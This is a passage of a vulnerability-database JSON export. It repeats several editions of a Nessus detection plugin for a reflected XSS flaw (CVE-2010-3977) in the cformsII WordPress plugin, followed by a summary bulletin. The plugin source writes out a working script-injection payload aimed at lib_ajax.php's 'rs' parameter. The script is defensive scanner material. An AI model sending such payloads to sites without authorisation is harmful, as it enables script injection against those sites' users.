generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Unknown at this time.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.8"}, "exploitAvailable": false, "exploitEase": "No exploit is required", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2010-10-30T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T13:02:38", "differentElements": ["cpe"], "edition": 8}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "9faf6f52e43e7d133f6b5422a7ebce6c", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3977", "https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-10-14T15:42:47", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "jvn", "idList": ["JVN:35256978"]}], "modified": "2021-10-14T15:42:47", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-14T15:42:47", "rev": 2}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "solution": "Unknown at this time.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.8"}, "exploitAvailable": false, "exploitEase": "No exploit is required", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2010-10-30T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-14T15:42:47", "differentElements": ["cvss"], "edition": 9}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "b7ad999828470684324dafeddd1fa01a", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/514579/30/0/threaded", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3977"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-10-15T02:51:07", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "jvn", "idList": ["JVN:35256978"]}], "modified": "2021-10-15T02:51:07", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-15T02:51:07", "rev": 2}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*"], "solution": "Unknown at this time.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.8"}, "exploitAvailable": false, "exploitEase": "No exploit is required", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2010-10-30T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-15T02:51:07", "differentElements": ["cpe", "cvss"], "edition": 10}], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "jvn", "idList": ["JVN:35256978"]}], "modified": "2021-10-16T02:34:52", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-16T02:34:52", "rev": 2}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Unknown at this time.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.8"}, "exploitAvailable": false, "exploitEase": "No exploit is required", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2010-10-30T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:11223", "bulletinFamily": "software", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2010-11-02T00:00:00", "modified": "2010-11-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11223", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:25037", "https://vulners.com/securityvulns/securityvulns:doc:25042", "https://vulners.com/securityvulns/securityvulns:doc:25033", "https://vulners.com/securityvulns/securityvulns:doc:25039", "https://vulners.com/securityvulns/securityvulns:doc:25034", "https://vulners.com/securityvulns/securityvulns:doc:25040", "https://vulners.com/securityvulns/securityvulns:doc:25038", "https://vulners.com/securityvulns/securityvulns:doc:25035", "https://vulners.com/securityvulns/securityvulns:doc:25036"], "cvelist": ["CVE-2010-3977", "CVE-2010-4006"], "type": "securityvulns", "lastseen": "2021-06-08T19:01:00", "history": [{"bulletin": {"affectedSoftware": [{"name": "cforms", "operator": "eq", "version": "11.5"}, {"name": "WSN Links", "operator": "eq", "version": "5.1"}, {"name": "WSN Links", "operator": "eq", "version": "5.0"}, {"name": "Joomla", "operator": "eq", "version": "1.5"}, {"name": "MemHT Portal", "operator": "eq", "version": "4.0"}, {"name": "WSN Links", "operator": "eq", "version": "6.0"}, {"name": "Webmedia Explorer", "operator": "eq", "version": "6.13"}], "bulletinFamily": "software", "cvelist": ["CVE-2010-3977", "CVE-2010-4006"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:09:39", "references": [{"idList": ["WPVDB-ID:8782", "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"], "type": "wpvulndb"}, {"idList": ["SSV:70274", "SSV:20225"], "type": "seebug"}, {"idList": ["PACKETSTORM:95395", "PACKETSTORM:95353"], "type": "packetstorm"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["CVE-2010-3977", "CVE-2010-4006"], "type": "cve"}, {"idList": ["EDB-ID:34946", "EDB-ID:15607"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:DOC:25034", "SECURITYVULNS:DOC:25033", "SECURITYVULNS:DOC:25042", "SECURITYVULNS:DOC:25039", "SECURITYVULNS:DOC:25036", "SECURITYVULNS:DOC:25037", "SECURITYVULNS:DOC:25035", "SECURITYVULNS:DOC:25040", "SECURITYVULNS:DOC:25038"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EXPLOITPACK:909DAB2F736DF1677428186DA5BD47B3"], "type": "exploitpack"}, {"idList": ["MYHACK58:62201028423"], "type": "myhack58"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "rev": 2}, "score": {"modified": "2018-08-31T11:09:39", "rev": 2, "value": 5.5, "vector": "NONE"}}, "hash": "f6b63607257600dea43bde48f907f1876ad87b35d214c000e84651149fe0d212", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "a45c550a93cccf6da6778534855a3d3a", "key": "published"}, {"hash": "c61e5d59aa5c4e535b518cca44e00a6f", "key": "description"}, {"hash": "a45c550a93cccf6da6778534855a3d3a", "key": "modified"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "7215ee9c7d9dc229d2921a40e899ec5f", "key": "reporter"}, {"hash": "c0b1e3d9344049129e9ce4fed4df5c8c", "key": "references"}, {"hash": "b1b1edf39d0cf5adb675e693da1e2f36", "key": "href"}, {"hash": "13f6853092be0f918b968b7838868f6e", "key": "cvelist"}, {"hash": "9caff91e9ebcf551c6d0d9d96b286138", "key": "title"}, {"hash": "c4c7df5a72533807b49827cd878a9bd2", "key": "affectedSoftware"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11223", "id": "SECURITYVULNS:VULN:11223", "immutableFields": [], "lastseen": "2018-08-31T11:09:39", "modified": "2010-11-02T00:00:00", "objectVersion": "1.5", "published": "2010-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:25037", "https://vulners.com/securityvulns/securityvulns:doc:25042", "https://vulners.com/securityvulns/securityvulns:doc:25033", "https://vulners.com/securityvulns/securityvulns:doc:25039", "https://vulners.com/securityvulns/securityvulns:doc:25034", "https://vulners.com/securityvulns/securityvulns:doc:25040", "https://vulners.com/securityvulns/securityvulns:doc:25038", "https://vulners.com/securityvulns/securityvulns:doc:25035", "https://vulners.com/securityvulns/securityvulns:doc:25036"], "reporter": " ", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "viewCount": 18}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:09:39"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "c10bcf79afa09a2d1b2305230fb38e5c"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "13f6853092be0f918b968b7838868f6e"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "b1b1edf39d0cf5adb675e693da1e2f36"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "a45c550a93cccf6da6778534855a3d3a"}, {"key": "published", "hash": "a45c550a93cccf6da6778534855a3d3a"}, {"key": "references", "hash": "c0b1e3d9344049129e9ce4fed4df5c8c"}, {"key": "reporter", "hash": "7215ee9c7d9dc229d2921a40e899ec5f"}, {"key": "title", "hash": "9caff91e9ebcf551c6d0d9d96b286138"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "0789635e53fcac6b5b3dd9564c69d2f5a3a269836162711b9b8e6cd31a14b019", "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-4006", "CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25038", "SECURITYVULNS:DOC:25035", "SECURITYVULNS:DOC:25039", "SECURITYVULNS:DOC:25034", "SECURITYVULNS:DOC:25040", "SECURITYVULNS:DOC:25036", "SECURITYVULNS:DOC:25037", "SECURITYVULNS:DOC:25042", "SECURITYVULNS:DOC:25033"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:909DAB2F736DF1677428186DA5BD47B3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201028423"]}, {"type": "seebug", "idList": ["SSV:70274", 